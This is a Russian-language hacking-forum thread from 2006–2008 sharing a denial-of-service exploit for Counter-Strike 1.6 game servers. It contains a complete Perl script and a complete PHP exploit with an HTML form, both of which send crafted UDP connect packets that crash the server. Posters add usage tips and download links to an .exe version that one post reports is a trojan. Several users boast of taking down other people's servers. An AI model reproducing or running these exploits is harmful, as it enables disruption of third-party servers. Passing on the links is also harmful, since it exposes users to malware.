Просмотр полной версии : Counter-Strike Dos exploit
gemaglabin
26.09.2006, 19:13
Counter-Strike 1.6 Dos exploit
Баг был найден небезызвестным хакером FUF`ом,имже и была написана exe версия.Мной был написан эксплоит на php.
Сплоит валит кс и очень сильно грузит систему.
Возможность указать пароль
Кароче,в архиве уже есть информация по испльзованию гуи версии,с php примерно все также.
Бывает что валится не с первого раза,но валит все 100 процентов серверов.Ну или стоит поменять тип авторизации на двойку
http://www.mytempdir.com/953029
Низнаю покозалось интересным вот и переёс , если не понравится модеры можите вернуть назад.
Zadoxlik
26.09.2006, 19:53
Фигасе ФУФик отжег =\
Сплоит в паблике уже довольно давно. Тот, что на перле. Работает на ура, как утверждает автор сплоита на cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server. Пользуюусь довольно давно в локалке, единственный минус - для удачной работы сплоита на сервере долно быть хоть одно свободное место. (а на больших общих и популярных серваках это бывает проблемой)
Сплоит в паблике уже довольно давно. Тот, что на перле. Работает на ура, как утверждает автор сплоита на cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server. Пользуюусь довольно давно в локалке, единственный минус - для удачной работы сплоита на сервере долно быть хоть одно свободное место. (а на больших общих и популярных серваках это бывает проблемой)
сплоит не перле валит серваки через кривой сд`кей.. тем более 28пачт (локал) закрывает эту багу.. а здесь бага в кривом нике.. гема сказал, что бага в нике с точками.. и не имеет ничего общего с перловым сплоитом..
зы. может вернете темку наверх, все равно паблик?
пардон конечно, гляну седня вечерком принцип работы. в общем все-равно главная проблема - залететь на серв, а если он забит, то только бесконечным циклом можно попытаться дождаться слота.
насколько помню, то сабж в паблике уже более полугода и работает для КС не старше 26 пат4а (у меня, например, 28ой стоит)
gemaglabin
27.09.2006, 14:43
Я уже задолбался говорить что эти баги разные.Тот сплоит основан на пустых полях,этот на нике.
В локалке не сработал (бинарник) , хотя перловый работаетн а ура. Ошибка [1], неверные данные, пасс оставил, чтобы проигнорировался потом, пробовал убрать пасс, все равно..
gemaglabin
28.09.2006, 08:33
Такой минимануал по exe версии.
Некоторые серверы падают после двойной посылки логин пакета.Следовательно 2 раза жмем Send ( недоработка Фуфа )
Пасс должен быть введен обязательно.Любой.Ествеств ено,если сервер защищен паролем,то надо вводить именно тот которым и защищен :)
Аторизация бывает двух типов - два и четыре.Попробуйте менять режимы во время досинга серверов.
Еще,как вариант - требуется наличие лицензионного cd кея.К сожалению мы не нашли такого спонсора и пришлось вбить первый попавшийся пиратский.Считайте это как руководство к доработке вами самими )
Я валил все серваки.ПО у всех одно,патч так еще и не выпустили так как эксплоит не получил массового распространения и в valve еще о нем не знают.Патч на старый pl сплоит вышел через нескольк месяцев после эксплоита.
Для более продвинутых советую запустить снифер и посмотреть последний пакет ответа от сервера.Если подклчение прошло успешно,вы увидете там свой ip адрес.В ином случае ответ будет варьироваться от ошибки - "BAD PASSWORD","INVALID AUTH TYPE" и прочее.
Вообщем,дерзайте и все у вас получится.Если не верите в работоспособность - в личку отправьте мне адрес и я скажу что надо делать "чтобы все было".
С php версией примерно все также,за исключением того,что сплоит итак логинится два раза.Разве что какая то ошибка и вам надо попробовать еще раз.
"Ошибка [1], неверные данные"
Возникает, когда от сервера не было получино ответа на пакет запроса информации, либо, когда ответ пришел, но явно не от кс сервера. Надо проверить ип и порт, а также посмотреть, коннектится ли сам кс к серверу =)
"хотя перловый работаетн а ура"
Еще и еще раз - стим патчи исправляют все баги, которые юзает перл скрипт. От сабжевого слпоита же пока что ничего не помогает.
Говорите, что у вас сплоит не работает, только если пишет rejected - сервер не принял эксплоит, но помните, перед падением сервер выдает эксплоиту такие ответы... и падает
сплойт нормально ведет себя на nosteam? 28 patch?
хз, последний (ПОСЛЕДНИЙ, дада) патч исправил проблему=)
лучше взять и проверить, а заодно запостить где еще он работает)
из того, что народ, что я знаю валил, теперь не падает ничего
подскажите плз как исправить проблему в случае втором?
вроде от первого избавился, но второй уже задолбал.
В локалке не сработал (бинарник) , хотя перловый работаетн а ура. Ошибка [1], неверные данные, пасс оставил, чтобы проигнорировался потом, пробовал убрать пасс, все равно..
Кароче проверял эти два эксплоита (перловский и экзешник) на патчах 7, 19, 28.
от перловского зависают 7 и 19
от экзешника 19 и 28
кароче от клиента приходит запрос на подключение вот с таким именем Born to be pig (..)(1)(HLTV)() и сервер подыхает.
может кто подскажет как исправить багу? :mad: :mad: :mad:
все работает! респект автору!!! не пробуйте на localhost!
как сменить метод аутентификации 4
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
на 2
что поменять надо?
тупо сменить 4 на 2 не катит
Дай те где скачать этот сплойт а то с того хостинга удалили
#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
Darkweider
19.02.2007, 19:33
Щас попробуем)
да это тот же самый сплоит, на который линки на первой странице лежат :)
пысы: ступил все-таки, проснулся тока... на эксплоит.ин этот ... валялся в вышеперечисленной сцылке, я не прочитал толком =\
DRON-ANARCHY
21.02.2007, 00:12
die "usage: ./csdos <host>" unless $ARGV[0];у меня писал, что лажа с сокетами. я перекуярил на
$host='192.168.0.*';
и теперь пишет, что CD-key инвалидный)
че делать? Может это я накосячил со своими доработками?)
gemaglabin
21.02.2007, 00:17
Наш сплоит и это старье на перле не путать какой раз уже пишу.а наш х3 где теперь если отыщу бекапы выложу.
Lizardman
21.02.2007, 00:52
Поищи плз. А то перловским я даж свой задосить не смог, а он уж не особо патченный.
откопал... ;)
труевый линк:
http://h1.jino-net.ru/cs.txt
а от этого скрипта какие-то обновления спасают?
я пробовал на линуксовом серваке nо steam (вроде 28 или 29)....
есть ещё способы хлопнуть кс сервак?
обновлений этого скрипта не было? чтоб валить последние версии кс
я не понял, с какими параметрами его надо запускаь?
и еще, песторасполож. влияеет на работу скрипта?
gemaglabin
23.02.2007, 17:04
http://underwater.xtoolz.ru/cs-exploit/cs-exploit.php
Парни дайте плиз ссылку на *.exe - шник
ПЛИЗ
http://anonymous.h17.ru/CSHack.exe - качай :)
После установки 28 патча на сервере эта фича не работает, а так серваки только так летали ;)
И плюсик пажалста.
http://underwater.xtoolz.ru/projects/cs/
Крутая штука. Exe версией завалил 4 сервака, притом своего провайдера.
Lizardman
17.04.2007, 01:47
Мда. Валится серв, который я обновлял неделю назад, 28 патч nosteam. Чем закрыть, кто-нить знает?
UPD. решение найдено, но пока не тестил.
http://ipb.cs-online.ru/index.php?showtopic=895
И кто же сможет устоять от Спрута? =\
Lizardman
17.04.2007, 02:22
Нет, это против отсылки точек в имени, т.е. Fuf'а. А что за спрут?
Апд.
Блин, хз какой патч, но обновлял, скачивая сервер с оффа. Так что валится и последняя но-стим версия((
gemaglabin
17.04.2007, 07:34
Там не в точках дело и серваки опять же валятся если немного подредактировать сплоит.Кстати,используя обычный брут пароля даже имхо к несуществующему нику - огромная нагрузка на сервер , игра становится пошаговой стратегией
Гем.....идея норм=)
Можно я напишу досер по бруту пароля?)
system_32
17.04.2007, 08:35
А для чего крушить КС то :?
ssk.ex0.uf0
17.04.2007, 12:21
А для чего крушить КС то :?
Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... :cool:
ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...
Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... :cool:
ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...
http://anonymous.h17.ru/CSHack.exe
Ух, завалил несчастный сервер местного КСера... :rolleyes:
сплоит +1
ssk.ex0.uf0
18.04.2007, 14:50
http://anonymous.h17.ru/CSHack.exe
По этому линку немогу скачать...
Если у кого есть возможность залить\перезалить...буду благодарен...
http://anonymous.h17.ru/CSHack.exe
По этому линку немогу скачать...
Если у кого есть возможность залить\перезалить...буду благодарен...
--http://ice1k.info/files/cshack.exe
SHaDoW[RF]
19.04.2007, 15:14
а как узнать пасс?
Darkweider
19.04.2007, 17:24
Убивает сервак насмерть=)
Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой
путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))
Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой
путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))
Есть...можно выпить пивка или накурица с админом, мб скажет пасс или даст админа даже =)
gold-goblin
04.12.2007, 19:02
выложите пожалуйста еще раз этот чуда ехе
это случайно не с красненькой иконкой, который коннектится вначале под ником Born to be pig... ? и только со второго раза кладёт сервак?
gold-goblin
04.12.2007, 19:15
Вроде он
На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?
/me пацталом.... нет. есть тока .txt сплоит... его надо вставлять вместо имени и коннактицо
inlanger
06.12.2007, 21:00
перевыложите куда-нить...а то все ссылки битые.
']а как узнать пасс?
Никак. Ибо спроси у админа =))
а есть ещё актуальные сплойты под кс?
.Striker
10.02.2008, 00:06
и те старые еще актуальны, но не на всех сервах
большое спасибо ребята за работу!!
перевыложите куда-нить...а то все ссылки битые.
http://img231.imageshack.us/img231/423/cshackgf7.jpg
Попробуй тут скачать:
>>DownLoad<< (http://rapidshare.com/files/35155810/CSHack.exe)
Ещё нашёл сплоит...
1я часть:
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>
<style type="text/css">
input {
width: 150px;
}
td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}
span.err {
color: red;
}
span.ok {
color: green;
}
</style>
</head>
<body onload="checkpass()">
<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">
<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>
<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>
<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>
<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>
<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>
</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>
2я часть
<?php
/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/
ini_set("display_errors","0");
function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}
function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}
function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\c l_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fi d\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}
function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updater ate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fi d\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}
function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}
IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>
по твоей ссылке троян
Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то)
Антивирус Версия Обновление Результат
AhnLab-V3 2008.2.4.10 2008.02.04 -
AntiVir 7.6.0.62 2008.02.04 TR/Agent.act.2
Authentium 4.93.8 2008.02.04 -
Avast 4.7.1098.0 2008.02.03 Win32:Agent-PJA
AVG 7.5.0.516 2008.02.04 Generic6.WSG
BitDefender 7.2 2008.02.04 Trojan.Generic.15882
CAT-QuickHeal 9.00 2008.02.04 -
ClamAV 0.92 2008.02.04 -
DrWeb 4.44.0.09170 2008.02.04 -
eSafe 7.0.15.0 2008.01.28 suspicious Trojan/Worm
eTrust-Vet 31.3.5509 2008.02.04 -
Ewido 4.0 2008.02.04 -
FileAdvisor 1 2008.02.04 High threat detected
Fortinet 3.14.0.0 2008.02.04 Grayware
F-Prot 4.4.2.54 2008.02.03 -
F-Secure 6.70.13260.0 2008.02.04 -
Ikarus T3.1.1.20 2008.02.04 Trojan.Win32.Agent.act
Kaspersky 7.0.0.125 2008.02.04 -
McAfee 5222 2008.02.04 -
Microsoft 1.3204 2008.02.04 -
NOD32v2 2847 2008.02.04 -
Norman 5.80.02 2008.02.04 -
Panda 9.0.0.4 2008.02.04 Trj/Downloader.MDW
Prevx1 V2 2008.02.04 Generic.Malware
Rising 20.29.22.00 2008.01.30 -
Sophos 4.26.0 2008.02.04 Mal/Generic-A
Sunbelt 2.2.907.0 2008.02.02 -
Symantec 10 2008.02.04 Trojan Horse
TheHacker 6.2.9.208 2008.02.04 -
VBA32 3.12.6.0 2008.02.03 Trojan.Win32.Agent.act
VirusBuster 4.3.26:9 2008.02.04 -
Webwasher-Gateway 6.6.2 2008.02.04 Trojan.Agent.act.2
p.s. А скрин то я с этого exe делал... ну да ладно)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot